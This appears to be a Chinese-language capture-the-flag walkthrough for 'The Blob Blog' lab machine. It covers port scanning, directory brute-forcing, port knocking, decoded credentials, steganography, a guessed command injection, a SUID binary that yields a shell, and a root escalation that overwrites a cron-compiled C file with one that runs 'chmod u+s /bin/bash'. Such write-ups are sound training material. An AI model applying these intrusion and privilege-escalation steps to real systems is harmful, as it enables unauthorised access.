The Blob Blog
端口扫描
root@ip-10-10-142-31:~# nmap -sTCV -p- --min-rate 1000 10.10.52.161
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-06 11:34 BST
Nmap scan report for ip-10-10-52-161.eu-west-1.compute.internal (10.10.52.161)
Host is up (0.00034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e7:28:a6:33:66:4e:99:9e:8e:ad:2f:1b:49:ec:3e:e8 (DSA)
| 2048 86:fc:ed:ce:46:63:4d:fd:ca:74:b6:50:46:ac:33:0f (RSA)
| 256 e0:cc:05:0a:1b:8f:5e:a8:83:7d:c3:d2:b3:cf:91:ca (ECDSA)
|_ 256 80:e3:45:b2:55:e2:11:31:ef:b1:fe:39:a8:90:65:c5 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:A5:F9:63:4D:77 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.60 seconds
80
root@ip-10-10-142-31:~# gobuster dir -u http://10.10.52.161/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.52.161/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/10/06 12:41:25 Starting gobuster
===============================================================
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/10/06 12:42:57 Finished
===============================================================
访问我们的 Index.html 页面我们可以从网页源代码中收集到两个内容:
-
一段 Base64 编码内容, 对其进行解密之后我得到的明文为:
When I was a kid, my friends and I would always knock on 3 of our neighbors doors. Always houses 1, then 3, then 5! -
一个 Bob 的密码 但是经过了编码 CyberChef
Dang it Bob, why do you always forget your password?
I'll encode for you here so nobody else can figure out what it is:
HcfP8J54AK4 --> 解码 cUpC4k3s
根据上面的内容我知道该进行端口敲击了,
root@ip-10-10-142-31:~/theblobblog/knock# ./knock 10.10.52.161 1 3 5
root@ip-10-10-142-31:~/theblobblog/knock# ./knock 10.10.52.161 1 3 5
之后在此进行端口扫描查看扫描结果, 从下面的结果中我们就可以知道隐藏端口开放成功
root@ip-10-10-142-31:~/theblobblog/knock# nmap -sTCV -p- --min-rate 1000 10.10.52.161
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-06 12:46 BST
Nmap scan report for ip-10-10-52-161.eu-west-1.compute.internal (10.10.52.161)
Host is up (0.00056s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e7:28:a6:33:66:4e:99:9e:8e:ad:2f:1b:49:ec:3e:e8 (DSA)
| 2048 86:fc:ed:ce:46:63:4d:fd:ca:74:b6:50:46:ac:33:0f (RSA)
| 256 e0:cc:05:0a:1b:8f:5e:a8:83:7d:c3:d2:b3:cf:91:ca (ECDSA)
|_ 256 80:e3:45:b2:55:e2:11:31:ef:b1:fe:39:a8:90:65:c5 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
5355/tcp open llmnr?
8080/tcp open http Werkzeug httpd 1.0.1 (Python 3.5.3)
|_http-server-header: Werkzeug/1.0.1 Python/3.5.3
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:A5:F9:63:4D:77 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 381.99 seconds
445
root@ip-10-10-142-31:~# gobuster dir -u http://10.10.52.161:445/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.52.161:445/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/10/06 13:03:48 Starting gobuster
===============================================================
/index.html (Status: 200)
/user (Status: 200)
/server-status (Status: 403)
- /index.html : 访问此我们可以从网页源代码中发现一个 Bob 的密码 p@55w0rd
- /user : 从这里我得到了一个 Openssh 的私钥,虽然暂时不知道干什么
21
使用我们得到的账号访问 FTP 服务 bob:p@55w0rd , 我这不知道出了什么问题一直没办法连接, 最终我们可以从 ftp 中得到一个照片 且这个照片存在文件隐写术, 我们可以使用之前得到的密码进行解密, 之后得到如下内容
zcv:p1fd3v3amT@55n0pr
/bobs_safe_for_stuff
- /bobs_safe_for_stuff : 访问 445 端口你可以发现一个新的文件
- 对于这个账号则存在加密行为我们需要进行解密CyberChef
8080
root@ip-10-10-142-31:~# gobuster dir -u http://10.10.52.161:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.52.161:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2023/10/06 12:56:14 Starting gobuster
===============================================================
/blog (Status: 302)
/login (Status: 200)
/review (Status: 302)
/blog1 (Status: 302)
/blog2 (Status: 302)
/blog3 (Status: 302)
/blog4 (Status: 302)
使用上面解密得到的密码来进行登陆, 之后观察这个网页, 发现是一个输入然后另一个会进行显示, 所以我合理猜测这里存在命令注入进行测试
后渗透
www-data
www-data —> bobloblaw
在枚举 SUID 时我们可以发现一个特殊的 SUID 程序
这里需要进行一些逆向分析, 直接上逆向分析后的源码, 其实使用 ghirda 直接逆向出来的代码你可能不知所云, 因为其存在一些问题, 所以在下面我进行了一些修改
int main(int argc, char *argv[]){
int iVar1;
int local_c = 1;
if(argc != 7){
printf("Order my blogs!\n");
} else{
while (local_c < 7){
iVar1 = atoi(*(char **)(argv + (long)local_c * 1));
printf("%d", iVar1);
if(iVar1 != 7-local_c){
printf("Hmm... I disagree!");
return 0;
}
local_c ++;
}
printf("Now that, I can get behind!");
setreuid(1000,1000);
system("/bin/sh");
}
}
- 首先我们需要传入的参数个数需要为 6 个
- 传入的参数需要为 : 6 5 4 3 2 1才可与i
bobloblaw —> root
在用户 bobloblaw 家目录发现几个图片, 可能存在文件隐写术
对其进行一些解密:
- dontlook.txt : 没有什么用
- whatscooking.txt : 告诉我们一个计时器, 我感觉可能时某些服务或者计划任务
上传 pspy 进行监听我发现一个 root 定时任务一直在执行编译的命令
我查看对应的源文件发现可以修改, 所以直接编写一个新的进行覆盖
(remote) bobloblaw@bobloblaw-VirtualBox:/home/bobloblaw/Documents$ ls -al
total 16
drwxr-xr-x 3 bobloblaw bobloblaw 4096 Jul 30 2020 .
drwxrwx--- 16 bobloblaw bobloblaw 4096 Aug 6 2020 ..
drwxrwx--- 2 bobloblaw bobloblaw 4096 Oct 7 00:07 .also_boring
-rw-rw---- 1 bobloblaw bobloblaw 92 Jul 30 2020 .boring_file.c
(remote) bobloblaw@bobloblaw-VirtualBox:/home/bobloblaw/Documents$ cat .boring_file.c
#include <stdio.h>
int main() {
printf("You haven't rooted me yet? Jeez\n");
return 0;
}
root@ip-10-10-165-240:~/theblobblog# cat .boring_file.c
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *command = "chmod u+s /bin/bash";
int result = system(command);
return 0;
}
扩展
Rabbit holes
如果你查看定时任务你会发现 root 用户会执行一条 root 命令 但是对应得目录你没有权限操作
(remote) root@bobloblaw-VirtualBox:/root# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /home/bobloblaw/Desktop/.uh_oh && tar -zcf /tmp/backup.tar.gz *
(remote) root@bobloblaw-VirtualBox:/root# ls -al /home/bobloblaw/Desktop/
total 44
drwxrwx--- 3 bobloblaw bobloblaw 4096 Oct 6 23:37 .
drwxrwx--- 16 bobloblaw bobloblaw 4096 Aug 6 2020 ..
-rw--w---- 1 bobloblaw bobloblaw 11054 Jul 24 2020 dontlookatthis.jpg
-rw--w---- 1 bobloblaw bobloblaw 10646 Jul 24 2020 lookatme.jpg
drwxrwx--- 2 root root 4096 Jul 28 2020 .uh_oh
-rw--w---- 1 bobloblaw bobloblaw 109 Jul 27 2020 user.txt